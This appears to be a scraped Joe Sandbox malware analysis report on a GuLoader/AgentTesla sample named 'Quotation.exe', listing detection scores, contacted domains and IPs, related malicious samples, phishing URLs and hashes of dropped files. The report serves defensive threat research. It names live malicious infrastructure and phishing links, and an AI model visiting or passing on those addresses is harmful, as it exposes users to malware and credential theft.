            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Quotation.exe58%ReversingLabsWin32.Trojan.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://api.ipify.org/t0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://mail.showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://r11.o.lencr.org0#0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://drive.google.com/0%Avira URL Cloudsafe
            https://drive.usercontent.google.com/0%Avira URL Cloudsafe
            http://r11.i.lencr.org/00%Avira URL Cloudsafe
            https://drive.usercontent.google.com/R0%Avira URL Cloudsafe
            http://nsis.sf.net/NSIS_Error...0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.174
            truefalse
              unknown
              drive.usercontent.google.com
              142.250.185.97
              truefalse
                unknown
                api.ipify.org
                104.26.13.205
                truefalse
                  unknown
                  showpiece.trillennium.biz
                  67.23.226.139
                  truetrue
                    unknown
                    mail.showpiece.trillennium.biz
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://showpiece.trillennium.bizQuotation.exe, 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.comQuotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.orgQuotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://r11.o.lencr.org0#Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://mail.showpiece.trillennium.bizQuotation.exe, 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/Quotation.exe, 00000003.00000002.3270442306.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://x1.c.lencr.org/0Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3294043978.0000000036424000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://x1.i.lencr.org/0Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3294043978.0000000036424000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://drive.usercontent.google.com/Quotation.exe, 00000003.00000003.2366718942.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3270442306.0000000003882000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2403781585.0000000003885000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://apis.google.comQuotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://nsis.sf.net/NSIS_Error...Quotation.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org/tQuotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://drive.usercontent.google.com/RQuotation.exe, 00000003.00000002.3270442306.0000000003882000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://r11.i.lencr.org/0Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      67.23.226.139
                      showpiece.trillennium.bizUnited States
                      33182DIMENOCUStrue
                      142.250.186.174
                      drive.google.comUnited States
                      15169GOOGLEUSfalse
                      104.26.13.205
                      api.ipify.orgUnited States
                      13335CLOUDFLARENETUSfalse
                      142.250.185.97
                      drive.usercontent.google.comUnited States
                      15169GOOGLEUSfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1548300
                      Start date and time:2024-11-04 09:59:04 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 28s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Quotation.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@3/12@4/4
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 86%
                      • Number of executed functions: 148
                      • Number of non-executed functions: 23
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Quotation.exe
                      TimeTypeDescription
                      04:00:33API Interceptor581632x Sleep call for process: Quotation.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      67.23.226.139Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                            PI 22_8_2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              COTIZACION 19 08 24.exeGet hashmaliciousAgentTeslaBrowse
                                pago.exeGet hashmaliciousAgentTeslaBrowse
                                  invoice.exeGet hashmaliciousAgentTeslaBrowse
                                    SijLVTsunN.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      DHL BILL OF LANDING SHIPPING INVOICE DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                        PO#86637 copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          104.26.13.205file.exeGet hashmaliciousUnknownBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                          • api.ipify.org/
                                          Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                          • api.ipify.org/
                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                          • api.ipify.org/
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          api.ipify.orgCopia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.12.205
                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.74.152
                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                          • 172.67.74.152
                                          7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                          • 104.26.12.205
                                          Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                          • 104.26.12.205
                                          Ordine d'acquisto OI16014 e OI1601.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.12.205
                                          https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                          • 104.26.12.205
                                          SecuriteInfo.com.Win32.Malware-gen.1695.31617.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 104.26.13.205
                                          8RuktpEZ8Q.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 104.26.12.205
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUSCopia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.12.205
                                          SC16C750BIB64 PHILIPS 2000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          client1.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.168.106
                                          https://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.fasttravelnet.xyz/YW5kcmVzLnRvcmliaW9AY2VsbG5leHRlbGVjb20uY29t&IdTracking=9008&user=000000Get hashmaliciousPhisherBrowse
                                          • 104.17.25.14
                                          B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.1.100
                                          Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.1.100
                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.1.100
                                          XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.1.100
                                          upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                          • 172.67.70.233
                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                          • 188.114.96.3
                                          DIMENOCUSQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 67.23.226.139
                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 67.23.226.139
                                          https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brGet hashmaliciousHTMLPhisherBrowse
                                          • 107.161.183.172
                                          http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                          • 107.161.183.172
                                          nklarm7.elfGet hashmaliciousUnknownBrowse
                                          • 109.73.163.173
                                          rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 138.128.178.242
                                          bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 98.142.105.97
                                          https://docsend.com/view/63jvhxyyj7pwxergGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                          • 64.37.50.172
                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                          • 199.168.186.114
                                          http://usaf.gov.ssGet hashmaliciousUnknownBrowse
                                          • 198.136.48.242
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eCopia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          SC16C750BIB64 PHILIPS 2000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 104.26.13.205
                                          B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          WDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                          • 104.26.13.205
                                          37f463bf4616ecd445d4a1937da06e19No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          kWcgTHdqyB.exeGet hashmaliciousStealc, VidarBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          EE85716273#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                          • 142.250.185.97
                                          • 142.250.186.174
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\nss46CE.tmp\System.dll1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):12288
                                                              Entropy (8bit):5.97694153396788
                                                              Encrypted:false
                                                              SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                              MD5:D6F54D2CEFDF58836805796F55BFC846
                                                              SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                                                              SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                                                              SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: 1364. 2024.exe, Detection: malicious, Browse
                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                              • Filename: Quote_220072.exe, Detection: malicious, Browse
                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                              • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                              • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                              • Filename: PO-000172483 (2).exe, Detection: malicious, Browse
                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                              Reputation:moderate, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):35
                                                              Entropy (8bit):4.264578373902383
                                                              Encrypted:false
                                                              SSDEEP:3:apWPWPjNLCNHiy:UPRCNHiy
                                                              MD5:58AC0B5E1D49D0EE1AED2FE13FAE6C7A
                                                              SHA1:02C8384573D47CA39F2E2ACA32B275861EC59A93
                                                              SHA-256:624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
                                                              SHA-512:8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:[broadspread]..slyngvrk=houghband..
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):482519
                                                              Entropy (8bit):1.2446382063037653
                                                              Encrypted:false
                                                              SSDEEP:1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
                                                              MD5:1D099F6122F4B7C8A78925726B59E5C3
                                                              SHA1:EEA154E31FF04CD1A2CED0193F7633ED219CFA47
                                                              SHA-256:1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
                                                              SHA-512:F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):288955
                                                              Entropy (8bit):1.2577770955280814
                                                              Encrypted:false
                                                              SSDEEP:768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
                                                              MD5:0B62328C4966F6B879B3C13B7FBD9C0D
                                                              SHA1:6DD81F12E739E81E06778067513ED1178A06AFC9
                                                              SHA-256:645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
                                                              SHA-512:2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................|............................................................[.................................................\.......................v...........o...................................m...........
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):340974
                                                              Entropy (8bit):1.254605943274635
                                                              Encrypted:false
                                                              SSDEEP:768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
                                                              MD5:49BE0E06F2E4F0CCFFB46426EE262642
                                                              SHA1:FF9C56C31A824E4CA087705C23D01D288FE34239
                                                              SHA-256:A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
                                                              SHA-512:27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................|. .....
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):399458
                                                              Entropy (8bit):7.576181832030088
                                                              Encrypted:false
                                                              SSDEEP:6144:LDplbZ05V2zN/hm4Qt4vENC20tkliS/+nFsNHo5JCaZ0BMz6GH0:LNlbGV2Z/MR4cNat3cHgJmMz8
                                                              MD5:AE18AD1D473CDB183050652CEDA5C015
                                                              SHA1:A4E4E1FDB5092B5E8C1836592A933220219E0465
                                                              SHA-256:14A8F61535835B9D36A36BA4588FA5C7B6F8B0712E0F17CC9CB571DEDBB5460B
                                                              SHA-512:26EF11EB6E92C4A49A8AF2E7888DDB023DD7795F5FC9D05D7F3CC139AA025845549B1F93E3ABDD0B410BC76D759FC677886C8D20EEADA9DC3EEAF42D2A0BF1DB
                                                              Malicious:false
                                                              Preview:....//.p..............................|.R.......gg..........<........i..9......$...ff.......C.........................W...|...........................R.F.......7.....#.....~....000.......`......................o........1...**.\.....0......;;;.NNN...,,........r...1.n........i.MjW...SZ...0~.=..,...'..t......q..f......f....&4.a1.H{&$.(.......c)..XJ.%.....:........1.+...9eh`x../...PbpG...AL.>U..3u7.y..l.f!5.6mO..Y.[......6.v...B....[A..|.."....;]..VR.....^9.......DD..2.........................@....8..#-..Ks?.....f.r...=....#..... .F<....*....E..n........i.MjW...SZ...0~.=.....t......4,...'..t......q..I4.a1.H{&$.(.......c)..XJ.%.....:..w...7......+...9eh`x../...PbpG...AL.>U..3u7.y..l.f!5.6mO..f...f.k.....v...B....[A..|.."....;]....}w.......VR.....^9.......DD..2........f.................@....8..#-..Ks?........=....#..... .F<....*....E..n........i.MjW...SZ...0~.=...dZ......4,...'..t......q..I4.a1.H{&$.(.......c)..XJ.%.....:..s.W...7......+...9eh`x.
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:Matlab v4 mat-file (little endian) \234\234\234, numeric, rows 6226008, columns 1953788928, imaginary
                                                              Category:dropped
                                                              Size (bytes):151977
                                                              Entropy (8bit):4.61386909245272
                                                              Encrypted:false
                                                              SSDEEP:3072:gpw4seASHVIkooxAzT90BlNoIXNDdu4B0:VCA8mLoimBlKIdDduG0
                                                              MD5:6B379F8EF49DAD739879E9C0C133DA91
                                                              SHA1:39D93DA83AAC396E331FFB5E998F574575241B14
                                                              SHA-256:B6EE19F43C0A6A088FD0D26E2C1A49ABA76D2A0BA76BAEA7D4D8783714520F58
                                                              SHA-512:596A2A55FFA79AF8B66C115317CBF6E283E7416A01C5F19B805015BC013CAEA831BE1BFD55653E5E225F04C4610C96652E4AB227FC3D187AC3991163C0504E8A
                                                              Malicious:false
                                                              Preview:....X._..tttt....................c..h...{{{...........1......??????.....................W.......N....HHH......................................|.................................T...........................................;.####....ll................??..\\.............."..........).......... .k....\\.......///..M......h..oooooo.....................5......................................~~......oo............. .................vvvv.4.FF....vvv..C....................................111111................<<<<...OO.{..t.....66.888..s....=.]........((...........e...............!............--...s.......r....!!.$$$..YY...............................HHH.................*.............QQQ.rr..l..........ss..b........X..........................................4.%.n..........D....lll..G................uu.C........XXXXXXXX.............++.].....YYY......................UU........cc.~..<..NN.............o.qqqq......xx.............k................................777...........}.....RRRR..++..........
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):392462
                                                              Entropy (8bit):1.241128723454179
                                                              Encrypted:false
                                                              SSDEEP:768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
                                                              MD5:F130EC3095DBECEDC791D8C58A59040C
                                                              SHA1:DAD2300B487F31F199520E1B41AB02B7D677B352
                                                              SHA-256:A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
                                                              SHA-512:8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
                                                              Malicious:false
                                                              Preview:..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):433786
                                                              Entropy (8bit):1.255949132332751
                                                              Encrypted:false
                                                              SSDEEP:768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
                                                              MD5:53FF1A157920AE92C9BF891D453D6B65
                                                              SHA1:B7BF3B7B16048F38132D8ACCA841130D73DB44C3
                                                              SHA-256:FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
                                                              SHA-512:E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
                                                              Malicious:false
